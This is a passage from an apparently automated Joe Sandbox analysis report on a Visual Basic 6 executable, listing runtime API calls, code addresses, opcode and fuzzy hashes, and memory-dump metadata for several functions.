                                                                                                                                                                                  • Instruction ID: 36ceea50de92772e66bb97ede622d2113149341719cd49f3f7e07eaeda4390cb
                                                                                                                                                                                  • Opcode Fuzzy Hash: a744b2239620e2a90fce2d31a3f43e904dc0f5ab9ad7dd985c9743abacca18f0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F31F875900208EFCB04DF94C949B9DBBB4FF48304F108669F515B73A0D774AA85CB98
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(00000001), ref: 0040CC8C
                                                                                                                                                                                  • __vbaNew2.MSVBVM60(004055D8,0041B8D8), ref: 0040CCA4
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040CCC7
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,00000040), ref: 0040CCEB
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,?), ref: 0040CD02
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004055C8,0000000C), ref: 0040CD18
                                                                                                                                                                                  • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040CD28
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60 ref: 0040CD31
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$CheckHresult$ErrorExitFreeListNew2Proc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 306309671-0
                                                                                                                                                                                  • Opcode ID: f05c769eef4a069bf0385cfeb3677b75dac682b0aa44aeb3ef3202b0df133bc0
                                                                                                                                                                                  • Instruction ID: 6c1e095cc9405d84f172de8fc6481e1172c739fb8f3d4ebecced46b1c4c61411
                                                                                                                                                                                  • Opcode Fuzzy Hash: f05c769eef4a069bf0385cfeb3677b75dac682b0aa44aeb3ef3202b0df133bc0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F312D71910214EBDB10AF95CE89EDEBBBCFF08B40F10412AF545B3690D77899458BA9
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _adj_fdiv_m64.MSVBVM60(660E6C4A,00000000), ref: 00414DCE
                                                                                                                                                                                  • __vbaR8IntI4.MSVBVM60(h#@,660E6C4A,00000000), ref: 00414DE2
                                                                                                                                                                                  • _adj_fdiv_m64.MSVBVM60 ref: 00414E27
                                                                                                                                                                                  • __vbaR8IntI4.MSVBVM60 ref: 00414E32
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba_adj_fdiv_m64
                                                                                                                                                                                  • String ID: h#@
                                                                                                                                                                                  • API String ID: 2746309926-1911584123
                                                                                                                                                                                  • Opcode ID: ab1f15620a1f862a28e7d7e9291dcfa6d74d0e301d23102f988617b6e0f2e5da
                                                                                                                                                                                  • Instruction ID: 05541adafa65650a58b6c4144f1ab09d364fc37ea7f5c0a10f88b274b74e223b
                                                                                                                                                                                  • Opcode Fuzzy Hash: ab1f15620a1f862a28e7d7e9291dcfa6d74d0e301d23102f988617b6e0f2e5da
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E214570A04301AFC7489F28EB4829ABBE5FBC8351F10853EE584962A4DB7C88D4C71A
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaRedim.MSVBVM60(00000080,00000001,0041B108,00000011,00000001,00000FFF,00000000,00000000,00419504), ref: 00418E5D
                                                                                                                                                                                  • __vbaGetOwner3.MSVBVM60(00407524,0041B108,00000000), ref: 00418E78
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00418E9A
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00418EAA
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(00000000,00419504), ref: 00418EE6
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(00000000,00419504), ref: 00418EFC
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60(00000000,00419504), ref: 00418F21
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Error$BoundsGenerate$OverflowOwner3Redim
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3413436688-0
                                                                                                                                                                                  • Opcode ID: 280288ce2d1da6d587684357634afb95be1490d94e7fd3b2f1c4005324fb1fb1
                                                                                                                                                                                  • Instruction ID: a558a39c5bab9556473eca7b03ab59ba202b493018f5e1d000dd0332b3e70a7e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 280288ce2d1da6d587684357634afb95be1490d94e7fd3b2f1c4005324fb1fb1
                                                                                                                                                                                  • Instruction Fuzzy Hash: F021D338604361EBC714CF14ED65BE17762FB48781B158069EE01A77A5CBB5A8C1CBDC
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,004025E6), ref: 0040E6EA
                                                                                                                                                                                  • __vbaCastObj.MSVBVM60(00000000,004071DC,?,?,?,?,?,?,?,?,004025E6), ref: 0040E6F8
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,004025E6), ref: 0040E703
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4,?,?,?,?,?,?,?,?,004025E6), ref: 0040E723
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E72C
                                                                                                                                                                                  • __vbaRaiseEvent.MSVBVM60(?,00000002,00000000,?,?,?,?,?,?,?,?,004025E6), ref: 0040E736
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E73F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$CastCheckErrorEventExitFreeHresultProcRaise
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2392155486-0
                                                                                                                                                                                  • Opcode ID: b7ab2b53e9fe8407814622c4ea2936945701b59724f8c03dfa2f10b314959642
                                                                                                                                                                                  • Instruction ID: 64c0aa39b9ec461804333c35a90b8c194e87fd5da105c06a014ba34ae980e718
                                                                                                                                                                                  • Opcode Fuzzy Hash: b7ab2b53e9fe8407814622c4ea2936945701b59724f8c03dfa2f10b314959642
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3211BF71900254ABCB00AFA5CD49E9E7B78FF49B04F10852AF945B62E1C77854418BE9
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60 ref: 00417458
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?,004174A7), ref: 0041747C
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00417484
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041748C
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00417494
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041749C
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004174A4
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Destruct$ExitProc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1594393734-0
                                                                                                                                                                                  • Opcode ID: 65cc65516ad45df1b1f5dcc83af42ead7481cbb47c4d7635c82ff8eb0cff5d94
                                                                                                                                                                                  • Instruction ID: 1c4b0c633f18c9e3bddb3555aaad557ebaf8a4bf2d76904fda437b0bccd5ade5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 65cc65516ad45df1b1f5dcc83af42ead7481cbb47c4d7635c82ff8eb0cff5d94
                                                                                                                                                                                  • Instruction Fuzzy Hash: 00E050B2D58218AAE744D7D0ED45FED7B3CEB84701F004116FA46AA0D89AA02A45CBB5
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60 ref: 0041887E
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?,004188CD), ref: 004188A2
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188AA
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188B2
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188BA
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188C2
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188CA
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Destruct$ExitProc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1594393734-0
                                                                                                                                                                                  • Opcode ID: 6d6b2ce9373d417b402dd24b6c4533e81eb0a1ea67bba482b0d9e88b5f08c903
                                                                                                                                                                                  • Instruction ID: 7559dc89658ccc2b58e0618bd5d3b53ed62fe53bb83953d9ec1d7c87f6bb5db1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d6b2ce9373d417b402dd24b6c4533e81eb0a1ea67bba482b0d9e88b5f08c903
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0AE050B2D44118AAEB44D7D0ED45FFD7B3CEB84701F04411AFB46AA0D8DAA42A45CFA5
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6), ref: 0041009E
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,00000000,660E6C30,660E0EBE,00000000,004025E6), ref: 004100CE
                                                                                                                                                                                    • Part of subcall function 00410C70: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,004100E0), ref: 00410C8E
                                                                                                                                                                                    • Part of subcall function 00410C70: __vbaOnError.MSVBVM60(000000FF,00000000,660E6C30,660E0EBE,00000000,004025E6), ref: 00410CBE
                                                                                                                                                                                    • Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60 ref: 00410CD3
                                                                                                                                                                                    • Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60(?,00000028,?), ref: 00410CEB
                                                                                                                                                                                    • Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60(?,00000000,?,0000001C,?,0000001C), ref: 00410D3B
                                                                                                                                                                                    • Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60(?), ref: 00410E35
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(001F0FFF,00000000), ref: 004100FC
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?), ref: 0041011C
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?), ref: 00410139
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?), ref: 00410155
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Error$System$Chkstk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1207130036-0
                                                                                                                                                                                  • Opcode ID: 885c88b7c4a7b9d42de6fe011f4235768c88f6b92c19c0712b662b2dd21f9fb8
                                                                                                                                                                                  • Instruction ID: 7b377bd5de676e89d855d9e41b3201db1aa312fdf1275dcf7b41b08b02665fd4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 885c88b7c4a7b9d42de6fe011f4235768c88f6b92c19c0712b662b2dd21f9fb8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 172107B5900348EBDB00DFE5DA49BDEBBB4FF48714F10812AE504B7290D7796A44CBA8
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7BF
                                                                                                                                                                                  • __vbaCastObj.MSVBVM60(00000000,004071DC,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7CD
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7D8
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7F8
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E801
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E807
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$CastCheckErrorExitFreeHresultProc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2075080343-0
                                                                                                                                                                                  • Opcode ID: 583a2b12934fe07e965f9a3ec7616fd2eb1ad477de0851f69ba3b3345f60b789
                                                                                                                                                                                  • Instruction ID: 3bf4f8c77da95384cc45dd6dff3f381c91b1124e7f22c247587acc69ccce5f1d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 583a2b12934fe07e965f9a3ec7616fd2eb1ad477de0851f69ba3b3345f60b789
                                                                                                                                                                                  • Instruction Fuzzy Hash: A1015B71940214ABCB00AFA5CE49EAABBB8FF48700F10456AF945B32A1C77854418EA9
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 00419681
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 0041968B
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60 ref: 00419694
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(004196D8), ref: 004196CB
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 004196D0
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 004196D5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Free$CloseFile$ExitProc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2014117853-0
                                                                                                                                                                                  • Opcode ID: 2d004a00b349fb87b40256e6660000f0fcf9f27bd89329952208d229b7140539
                                                                                                                                                                                  • Instruction ID: dfea4ae46e95b786737fd6ac62915e102b9398e5dcf88c16ee641d2aebd4778e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d004a00b349fb87b40256e6660000f0fcf9f27bd89329952208d229b7140539
                                                                                                                                                                                  • Instruction Fuzzy Hash: 12E01276821128AACB04EBA0FD206DC3BB8FB08310B118026E846B3174DB742D84CFA8
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(00000001,?,x$@,?,?,?,?,?,00000000,004025E6), ref: 004189B6
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 004189E7
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00418A02
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Error$ExitOverflowProc
                                                                                                                                                                                  • String ID: XuA$x$@
                                                                                                                                                                                  • API String ID: 3328922952-1101804690
                                                                                                                                                                                  • Opcode ID: c076097e3a78d3169a304b0a4590783ceaa35cecd4cc0d2262e250e498d51d51
                                                                                                                                                                                  • Instruction ID: f41aac51504d4341bf14d78ed7085f01873fde132ca3eda0e8d0e8435c4d1104
                                                                                                                                                                                  • Opcode Fuzzy Hash: c076097e3a78d3169a304b0a4590783ceaa35cecd4cc0d2262e250e498d51d51
                                                                                                                                                                                  • Instruction Fuzzy Hash: 310180B5D00254AFC710DF989A056DDFBB4EB08B50F10426BE805A3350C77458408BEA
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 0040E295
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007BC), ref: 0040E2BA
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004071CC,00000094), ref: 0040E2E4
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 0040E2F3
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 0040E2F9
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$CheckHresult$ErrorExitFreeProc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4045702744-0
                                                                                                                                                                                  • Opcode ID: ccc439e8694d0f94d9a812796e14e68a8162fab669cebb24eee0f06880352765
                                                                                                                                                                                  • Instruction ID: b42082684cfda9da04a5b7e5b2bad02e9e7a05c797a4a6675c2a700778014143
                                                                                                                                                                                  • Opcode Fuzzy Hash: ccc439e8694d0f94d9a812796e14e68a8162fab669cebb24eee0f06880352765
                                                                                                                                                                                  • Instruction Fuzzy Hash: 87114A74900214ABCB00DFA6CD48EDEBFF8FF98700F24456AF445B72A0C77859418AA9
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%